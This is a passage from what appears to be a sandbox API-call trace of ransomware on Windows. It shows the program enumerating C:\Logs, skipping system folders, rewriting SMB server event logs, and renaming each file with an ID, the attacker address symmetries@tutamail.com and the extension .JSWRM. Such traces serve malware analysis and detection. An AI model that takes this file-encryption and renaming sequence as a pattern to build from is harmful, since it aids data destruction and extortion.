cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0066.179] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f69c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0066.179] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232d50 [0066.180] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-SMBServer%4Audit.evtx" (normalized: "c:\\logs\\microsoft-windows-smbserver%4audit.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0066.180] GetFileSizeEx (in: hFile=0x450, lpFileSize=0x345f630 | out: lpFileSize=0x345f630*=69632) returned 1 [0066.180] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0066.180] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11000) returned 0x2481b0 [0066.180] ReadFile (in: hFile=0x450, lpBuffer=0x2481b0, nNumberOfBytesToRead=0x11000, lpNumberOfBytesRead=0x345f63c, lpOverlapped=0x0 | out: lpBuffer=0x2481b0*, lpNumberOfBytesRead=0x345f63c*=0x11000, lpOverlapped=0x0) returned 1 [0066.187] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0066.187] WriteFile (in: hFile=0x450, lpBuffer=0x2481b0*, nNumberOfBytesToWrite=0x11000, lpNumberOfBytesWritten=0x345f638, lpOverlapped=0x0 | out: lpBuffer=0x2481b0*, lpNumberOfBytesWritten=0x345f638*=0x11000, lpOverlapped=0x0) returned 1 [0066.187] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2481b0 | out: hHeap=0x1e0000) returned 1 [0066.187] CloseHandle (hObject=0x450) returned 1 [0066.189] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232e88 [0066.189] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0066.189] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0066.189] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f84e8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0066.190] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8638 [0066.190] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0066.190] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0066.190] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0066.190] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0066.190] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0066.190] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2093c8 [0066.190] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa6) returned 0x217b40 [0066.190] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2093c8 | out: hHeap=0x1e0000) returned 1 [0066.190] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf8) returned 0x20e550 [0066.190] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x217b40 | out: hHeap=0x1e0000) returned 1 [0066.190] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8638 | out: hHeap=0x1e0000) returned 1 [0066.190] MoveFileW (lpExistingFileName="C:\\Logs\\Microsoft-Windows-SMBServer%4Audit.evtx" (normalized: "c:\\logs\\microsoft-windows-smbserver%4audit.evtx"), lpNewFileName="C:\\Logs\\Microsoft-Windows-SMBServer%4Audit.evtx.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\logs\\microsoft-windows-smbserver%4audit.evtx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0066.190] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e550 | out: hHeap=0x1e0000) returned 1 [0066.190] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232e88 | out: hHeap=0x1e0000) returned 1 [0066.190] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232d50 | out: hHeap=0x1e0000) returned 1 [0066.190] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0066.191] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f87c0 | out: hHeap=0x1e0000) returned 1 [0066.191] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcb19dd19, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcb19dd19, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dd3053, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-SMBServer%4Connectivity.evtx", cAlternateFileName="MI8248~1.EVT")) returned 1 [0066.191] lstrcmpiW (lpString1="Microsoft-Windows-SMBServer%4Connectivity.evtx", lpString2=".") returned 1 [0066.191] lstrcmpiW (lpString1="Microsoft-Windows-SMBServer%4Connectivity.evtx", lpString2="..") returned 1 [0066.191] lstrcmpiW (lpString1="Microsoft-Windows-SMBServer%4Connectivity.evtx", lpString2="...") returned 1 [0066.191] lstrcmpiW (lpString1="Microsoft-Windows-SMBServer%4Connectivity.evtx", lpString2="windows") returned -1 [0066.191] lstrcmpiW (lpString1="Microsoft-Windows-SMBServer%4Connectivity.evtx", lpString2="recovery") returned -1 [0066.191] lstrcmpiW (lpString1="Microsoft-Windows-SMBServer%4Connectivity.evtx", lpString2="perflogs") returned -1 [0066.191] lstrcmpiW (lpString1="Microsoft-Windows-SMBServer%4Connectivity.evtx", lpString2="documents and settings") returned 1 [0066.191] lstrcmpiW (lpString1="Microsoft-Windows-SMBServer%4Connectivity.evtx", lpString2="$RECYCLE.BIN") returned 1 [0066.191] lstrcmpiW (lpString1="Microsoft-Windows-SMBServer%4Connectivity.evtx", lpString2="system volume information") returned -1 [0066.191] lstrcmpiW (lpString1="Microsoft-Windows-SMBServer%4Connectivity.evtx", lpString2="msocache") returned -1 [0066.191] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232d50 [0066.191] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-SMBServer%4Connectivity.evtx", cchWideChar=46, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 46 [0066.191] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0066.191] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-SMBServer%4Connectivity.evtx", cchWideChar=46, lpMultiByteStr=0x1f8328, cbMultiByte=46, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft-Windows-SMBServer%4Connectivity.evtx", lpUsedDefaultChar=0x0) returned 46 [0066.191] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232d50 | out: hHeap=0x1e0000) returned 1 [0066.191] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232ce8 [0066.191] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-SMBServer%4Connectivity.evtx", cchWideChar=46, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 46 [0066.191] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0066.191] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-SMBServer%4Connectivity.evtx", cchWideChar=46, lpMultiByteStr=0x1f84e8, cbMultiByte=46, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft-Windows-SMBServer%4Connectivity.evtx", lpUsedDefaultChar=0x0) returned 46 [0066.191] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232ce8 | out: hHeap=0x1e0000) returned 1 [0066.191] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209350 [0066.191] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232bb0 | out: hHeap=0x1e0000) returned 1 [0066.191] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0066.191] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f69c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0066.191] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209698 [0066.191] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-SMBServer%4Connectivity.evtx" (normalized: "c:\\logs\\microsoft-windows-smbserver%4connectivity.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0066.192] GetFileSizeEx (in: hFile=0x450, lpFileSize=0x345f630 | out: lpFileSize=0x345f630*=69632) returned 1 [0066.192] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0066.192] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11000) returned 0x2481b0 [0066.192] ReadFile (in: hFile=0x450, lpBuffer=0x2481b0, nNumberOfBytesToRead=0x11000, lpNumberOfBytesRead=0x345f63c, lpOverlapped=0x0 | out: lpBuffer=0x2481b0*, lpNumberOfBytesRead=0x345f63c*=0x11000, lpOverlapped=0x0) returned 1 [0066.244] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0066.244] WriteFile (in: hFile=0x450, lpBuffer=0x2481b0*, nNumberOfBytesToWrite=0x11000, lpNumberOfBytesWritten=0x345f638, lpOverlapped=0x0 | out: lpBuffer=0x2481b0*, lpNumberOfBytesWritten=0x345f638*=0x11000, lpOverlapped=0x0) returned 1 [0066.245] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2481b0 | out: hHeap=0x1e0000) returned 1 [0066.245] CloseHandle (hObject=0x450) returned 1 [0066.274] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2095a8 [0066.274] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0066.274] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f87c0 [0066.274] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f87c0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0066.274] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8638 [0066.274] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f87c0 | out: hHeap=0x1e0000) returned 1 [0066.274] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0066.274] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3f0 [0066.275] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3f0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0066.275] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3f0 | out: hHeap=0x1e0000) returned 1 [0066.275] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2257f0 [0066.275] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0066.275] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2257f0 | out: hHeap=0x1e0000) returned 1 [0066.275] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11c) returned 0x23f848 [0066.275] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0066.275] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8638 | out: hHeap=0x1e0000) returned 1 [0066.275] MoveFileW (lpExistingFileName="C:\\Logs\\Microsoft-Windows-SMBServer%4Connectivity.evtx" (normalized: "c:\\logs\\microsoft-windows-smbserver%4connectivity.evtx"), lpNewFileName="C:\\Logs\\Microsoft-Windows-SMBServer%4Connectivity.evtx.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\logs\\microsoft-windows-smbserver%4connectivity.evtx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0066.276] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f848 | out: hHeap=0x1e0000) returned 1 [0066.276] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2095a8 | out: hHeap=0x1e0000) returned 1 [0066.276] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209698 | out: hHeap=0x1e0000) returned 1 [0066.276] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0066.276] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0066.276] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcb151873, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcb151873, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-SMBServer%4Operational.evtx", cAlternateFileName="MI4B6B~1.EVT")) returned 1 [0066.276] lstrcmpiW (lpString1="Microsoft-Windows-SMBServer%4Operational.evtx", lpString2=".") returned 1 [0066.276] lstrcmpiW (lpString1="Microsoft-Windows-SMBServer%4Operational.evtx", lpString2="..") returned 1 [0066.276] lstrcmpiW (lpString1="Microsoft-Windows-SMBServer%4Operational.evtx", lpString2="...") returned 1 [0066.276] lstrcmpiW (lpString1="Microsoft-Windows-SMBServer%4Operational.evtx", lpString2="windows") returned -1 [0066.276] lstrcmpiW (lpString1="Microsoft-Windows-SMBServer%4Operational.evtx", lpString2="recovery") returned -1 [0066.276] lstrcmpiW (lpString1="Microsoft-Windows-SMBServer%4Operational.evtx", lpString2="perflogs") returned -1 [0066.276] lstrcmpiW (lpString1="Microsoft-Windows-SMBServer%4Operational.evtx", lpString2="documents and settings") returned 1 [0066.276] lstrcmpiW (lpString1="Microsoft-Windows-SMBServer%4Operational.evtx", lpString2="$RECYCLE.BIN") returned 1 [0066.276] lstrcmpiW (lpString1="Microsoft-Windows-SMBServer%4Operational.evtx", lpString2="system volume information") returned -1 [0066.276] lstrcmpiW (lpString1="Microsoft-Windows-SMBServer%4Operational.evtx", lpString2="msocache") returned -1 [0066.276] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232e88 [0066.276] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-SMBServer%4Operational.evtx", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0066.276] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0066.276] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-SMBServer%4Operational.evtx", cchWideChar=45, lpMultiByteStr=0x1f84e8, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft-Windows-SMBServer%4Operational.evtx", lpUsedDefaultChar=0x0) returned 45 [0066.276] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232e88 | out: hHeap=0x1e0000) returned 1 [0066.276] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232fc0 [0066.276] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-SMBServer%4Operational.evtx", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0066.276] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f87c0 [0066.276] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-SMBServer%4Operational.evtx", cchWideChar=45, lpMultiByteStr=0x1f87c0, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft-Windows-SMBServer%4Operational.evtx", lpUsedDefaultChar=0x0) returned 45 [0066.276] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232fc0 | out: hHeap=0x1e0000) returned 1 [0066.277] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209530 [0066.277] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209350 | out: hHeap=0x1e0000) returned 1 [0066.277] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0066.277] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f69c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0066.277] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2091e8 [0066.277] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-SMBServer%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-smbserver%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0066.277] GetFileSizeEx (in: hFile=0x450, lpFileSize=0x345f630 | out: lpFileSize=0x345f630*=69632) returned 1 [0066.277] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0066.277] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11000) returned 0x2481b0 [0066.277] ReadFile (in: hFile=0x450, lpBuffer=0x2481b0, nNumberOfBytesToRead=0x11000, lpNumberOfBytesRead=0x345f63c, lpOverlapped=0x0 | out: lpBuffer=0x2481b0*, lpNumberOfBytesRead=0x345f63c*=0x11000, lpOverlapped=0x0) returned 1 [0066.282] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0066.282] WriteFile (in: hFile=0x450, lpBuffer=0x2481b0*, nNumberOfBytesToWrite=0x11000, lpNumberOfBytesWritten=0x345f638, lpOverlapped=0x0 | out: lpBuffer=0x2481b0*, lpNumberOfBytesWritten=0x345f638*=0x11000, lpOverlapped=0x0) returned 1 [0066.283] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2481b0 | out: hHeap=0x1e0000) returned 1 [0066.283] CloseHandle (hObject=0x450) returned 1 [0066.285] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2093c8 [0066.285] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0066.285] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8638 [0066.285] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8638, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0066.285] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8670 [0066.285] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8638 | out: hHeap=0x1e0000) returned 1 [0066.285] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0066.285] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3c0 [0066.285] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3c0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0066.285] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3c0 | out: hHeap=0x1e0000) returned 1 [0066.285] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225658 [0066.285] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0066.285] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225658 | out: hHeap=0x1e0000) returned 1 [0066.285] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11c) returned 0x23f4d0 [0066.285] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0066.285] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8670 | out: hHeap=0x1e0000) returned 1 [0066.285] MoveFileW (lpExistingFileName="C:\\Logs\\Microsoft-Windows-SMBServer%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-smbserver%4operational.evtx"), lpNewFileName="C:\\Logs\\Microsoft-Windows-SMBServer%4Operational.evtx.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\logs\\microsoft-windows-smbserver%4operational.evtx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0066.286] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f4d0 | out: hHeap=0x1e0000) returned 1 [0066.286] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2093c8 | out: hHeap=0x1e0000) returned 1 [0066.286] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2091e8 | out: hHeap=0x1e0000) returned 1 [0066.286] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f87c0 | out: hHeap=0x1e0000) returned 1 [0066.286] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0066.286] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcb177aca, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcb177aca, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dd3053, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-SMBServer%4Security.evtx", cAlternateFileName="MI7709~1.EVT")) returned 1 [0066.286] lstrcmpiW (lpString1="Microsoft-Windows-SMBServer%4Security.evtx", lpString2=".") returned 1 [0066.286] lstrcmpiW (lpString1="Microsoft-Windows-SMBServer%4Security.evtx", lpString2="..") returned 1 [0066.286] lstrcmpiW (lpString1="Microsoft-Windows-SMBServer%4Security.evtx", lpString2="...") returned 1 [0066.286] lstrcmpiW (lpString1="Microsoft-Windows-SMBServer%4Security.evtx", lpString2="windows") returned -1 [0066.286] lstrcmpiW (lpString1="Microsoft-Windows-SMBServer%4Security.evtx", lpString2="recovery") returned -1 [0066.286] lstrcmpiW (lpString1="Microsoft-Windows-SMBServer%4Security.evtx", lpString2="perflogs") returned -1 [0066.287] lstrcmpiW (lpString1="Microsoft-Windows-SMBServer%4Security.evtx", lpString2="documents and settings") returned 1 [0066.287] lstrcmpiW (lpString1="Microsoft-Windows-SMBServer%4Security.evtx", lpString2="$RECYCLE.BIN") returned 1 [0066.287] lstrcmpiW (lpString1="Microsoft-Windows-SMBServer%4Security.evtx", lpString2="system volume information") returned -1 [0066.287] lstrcmpiW (lpString1="Microsoft-Windows-SMBServer%4Security.evtx", lpString2="msocache") returned -1 [0066.287] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232c18 [0066.287] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-SMBServer%4Security.evtx", cchWideChar=42, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0066.287] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0066.287] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-SMBServer%4Security.evtx", cchWideChar=42, lpMultiByteStr=0x1f8328, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft-Windows-SMBServer%4Security.evtx", lpUsedDefaultChar=0x0) returned 42 [0066.287] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232c18 | out: hHeap=0x1e0000) returned 1 [0066.287] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232d50 [0066.287] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-SMBServer%4Security.evtx", cchWideChar=42, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 